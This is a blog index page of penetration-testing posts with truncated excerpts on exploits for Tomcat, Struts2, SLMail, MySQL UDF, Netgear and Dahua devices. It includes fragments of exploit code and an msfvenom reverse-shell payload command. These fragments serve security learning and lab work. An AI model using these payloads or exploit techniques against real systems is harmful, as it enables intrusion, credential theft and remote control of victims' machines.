- 博客(341)
- 资源 (1)
- 收藏
- 关注
RSS订阅
原创 Security Lab
Following table gives the URLs of all the vulnerable web applications,operating system installations, old software and war games [hacking] sites. TheURLs for individual applications that are part of o
2014-08-10 22:40:16
2497
转载 Exploit - Apache Tomcat Directory/Path Traversal
http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/usersPrevious URL would copy file na
2017-04-06 18:20:06
2328
原创 Exploit - RFID
RFID HackingPrepareInstall Proxmark3Check Proxmark3 / card statusCrack KeysPRNG AttackNESTED AttackDump data & Write dataPrepareInstall Proxmark3$ sudo apt-get install git build-essential libread
2017-04-01 13:24:32
2061
原创 Python - decode ip header
#!/usr/bin/python# -*- coding: utf-8 -*-from ctypes import *import socketimport structclass IP(Structure): _fields_ = [ ("ihl", c_uint8, 4), ("version", c_uint8, 4), ("to
2017-03-30 11:51:07
1641
原创 Python - NTP
In order to learn ntp protocol and protect ntp server against NTP DDOS Attack. We need a vulnable ntp server.Install a vulnerable NTP Server - NTP 4.2.6#!/bin/bashwget -c https://www.eecis.udel.edu/~nt
2017-03-28 12:41:50
1616
原创 Exploit - mysql unsha1
mysql-unsha1Authenticate against a MySQL server without knowing the cleartext password.AbstractThis PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with
2017-03-27 11:45:47
1330
原创 exploit - dahua camera backdoor
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168
2017-03-17 17:13:15
11056
原创 Python - rpcinfo
In order to scan all rpc hosts in lannet and save it into the databse, we need to create a script. $ rpcinfo -p 10.94.106.24 program vers proto port 100000 4 tcp 111 rpcbind 100
2017-03-15 13:30:03
1257
原创 Compile zmap in Mac OSX
The quickest way to install zmap in Mac OSX is :$ brew install zmapBut, it may fails at sometimes. ex:$ time zmap -o icmpscan.csv --probe-module icmp_echoscan --whitelist-file=wh.txtMar 09 12:23:26.57
2017-03-09 13:34:42
1024
原创 exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-FrameworkExp Code#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlCo
2017-03-07 17:13:45
5665
1
原创 python - weixin bot
If you are a newbee, please just run it. If you are a developer. please use it as a module.python>>> import webwxbot>>> dir(webwxbot)>>> wx = webwxbot.WEIXINBOT()>>> dir(wx)['__class__', '__delatt
2017-03-02 19:20:57
1072
转载 Burpsuite - Extension: SQLipy
Referenceshttps://github.com/codewatchorg/sqlipy/blob/master/SQLiPy.pyhttps://www.codewatch.org/blog/?p=402
2017-01-03 18:24:38
1320
原创 Burpsuite - Extension: Import Links into Sitemap
How to import Links into Sitemap ?Please select “Import Links from a file” in the right menu.Note: If the links file is too large, it may cost too much !Codefrom burp import IBurpExtenderfrom burp im
2017-01-03 15:30:41
1010
原创 Burpsuite - Extension: Bulk Requests
Site Map Fetcher, This extension fetches the responses of unrequested items in the site map. When browsing a target, Burp adds to the site map any items that are inferred from actual responses. Some of
2017-01-03 11:22:27
726
原创 Burpsuite - Extension: Get All Proxied Hosts
How to get all proxied hosts from burpsuite sitemap ?from burp import IBurpExtenderfrom burp import IContextMenuFactoryfrom javax.swing import JMenuItemfrom java.util import List, ArrayListfrom java
2017-01-01 19:43:45
493
原创 Docker - Cannot connect to the Docker daemon
Start docker, and pull bkimminich/juice-shop. Console says$ docker pull bkimminich/juice-shopUsing default tag: latestWarning: failed to get default registry endpoint from daemon (Cannot connect to t
2016-12-27 18:21:33
4506
原创 Router - Netgear Remote Command Injection
DescriptionNETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit
2016-12-15 14:33:27
655
原创 Android - Application Reversing
How to pwn cocon.apk ?A CTF Android apk called cocon.apk, and we need to decrypt the hash value (ctf flag). Please prepare a smartphone and install the apk file. If successful, android desktop will sho
2016-12-13 14:29:47
838
原创 Metasploit - ERROR: cannot discover where libxml2 is located on your system
metasploit-framework [rapid7-master] ->> rvm listrvm rubies=* ruby-2.3.3 [ x86_64 ]# => - current# =* - current && default# * - defaultWhen ruby is updated from ruby-2.3.1 to ruby-2.3.3. It will ma
2016-12-07 13:57:47
1598
原创 Metasploit - spawn a cmd shell into meterpreter
generate vbs payload with metasploit./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f vbs --arch x86 --platform winNo encoder or badchars specified, outpu
2016-11-01 18:45:16
1451
原创 Pentest - mysql udf privilege escalation
How to compile UDF DLL#include <stdio.h>#include <stdlib.h>enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};typedef struct st_udf_args { unsigned int arg_count; // num
2016-10-31 22:46:53
1087
原创 Python - rq / mrq / Celery
rqSimple job queues for Python http://python-rq.orgPlease read the results from redis server.mrqMr. Queue - A distributed worker task queue in Python using Redis & gevent - https://github.com/pricingas
2016-10-26 14:01:17
1850
原创 Metasploit - auxiliary/gather/censys_search
msf > use auxiliary/gather/censys_search msf > set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX msf >set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX msf >set CENSYS_DORK rapid7Certificates Sea
2016-10-25 12:04:10
1139
原创 Metasploit - auxiliary/gather/zoomeye_search
How to use ZoomEye API ?If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you.$ sudo easy_install zoomeye-SDKor$ sudo pip install git+https://github.
2016-10-19 01:08:53
521976
转载 PowerShell - PowerShell’s Security Guiding Principles
PS C:\Users\test\Desktop\PowerSploit-master\Exfiltration> Set-ExecutionPolicy DefaultExecution Policy ChangeThe execution policy helps protect you from scripts that you do not trust. Changing the exec
2016-10-15 22:03:47
762
转载 Pentest - PowerShell and Token Impersonation
This post will discuss bringing incognito-like functionality to PowerShell in the form of a new PowerShell script (Invoke-TokenManipulation), with some important differences. I’ll split this post up in
2016-10-15 17:58:34
840
原创 Metasploit - enmu_linux
enum_linux.rcrun post/linux/gather/enum_configsrun post/linux/gather/enum_protectionsrun post/linux/gather/enum_systemrun post/linux/gather/enum_xchatrun post/linux/gather/enum_networkrun post/lin
2016-10-14 13:45:00
565
原创 Python - WIFI Scan
How to find weak wireless APs with SSID:BSSID ? #!/usr/bin/python# -*- coding: utf8 -*-from access_points import get_scannerdef parse_apinfo(ap): return (ap['quality'], ap['ssid'], ap['bssid'])d
2016-10-09 10:27:42
4434
1
原创 Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
Summary A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret
2016-09-29 21:26:54
1479
原创 Vuln - Cisco - CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/Exploit Cisco CVE-2016-6366msf auxiliary(snmp_login) > set PASSWORD publicPASSWORD => publicmsf auxiliary(snmp_login) > set RHOSTS 192.168.206.114RHOST
2016-09-26 16:46:57
2969
转载 Linux - How to check processor and cpu details
Processor/CPU detailsThe details about the processor that we shall be talking about include, number of cores, availability of hyper threading, architecture, cache size etc. To find these details about
2016-09-20 11:17:59
1280
原创 vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit
Deploy a vuln labPlease install docker yourself.#!/bin/bashdocker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124Dockerfile# docker php tag list
2016-09-15 00:07:05
1290
转载 How to scan whole Internet 3.7 billion IP addresses in few minutes?
Cyber security audit and ethical hacking training professionals normally use scanner to scans the networks. Scanning every IP address on the internet isn’t an easy job, and if you don’t have the resour
2016-09-12 18:13:49
596
原创 Linux - mipsel/mips/arm/armeb - gdb compile
If you don’t know what’s buildroot ?, please redirect to https://www.uclibc.org/How to install buildrootroot@lab:~# uname -aLinux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) i686 G
2016-08-22 17:24:32
3601
原创 Linux - mysql sql injection
select user from user where user=’ro’ ‘ot’=0;When user is root, it should query as follow:1. select user from user where user='ro' 'ot'=0;2. select user from user where 'root'='ro' 'ot'=0;3. select
2016-08-19 18:10:05
580
原创 Pentest - routersploit
$ git clone https://github.com/reverse-shell/routersploit$ sudo pip install -r requirements.txt$ python2 rsf.py ______ _ _____ _ _ _ | ___ \ | |
2016-08-16 23:21:31
2638
原创 Linux - setup a tftp server
tftp serverroot@kali:~# atftpdUsage: tftpd [options] [directory] [options] may be: -t, --tftpd-timeout <value>: number of second of inactivity before exiting -r, --retry-timeout <value>: time to
2016-08-10 12:02:28
720
原创 Linux - rpcclient
Demoroot@kali:~/reports# rpcclient -U "" 10.11.1.227Enter 's password: rpcclient $> help--------------- ---------------------- CLUSAPI clusapi_open_cluster blaclusapi_ge
2016-08-06 13:37:55
2746
1
原创 exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/#!/usr/bin/python# -*- encoding: utf-8 -*-import sysimport socketimport struct## OS Name: Microsoft Windows XP Professional# OS Version:
2016-07-26 22:30:52
3268
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人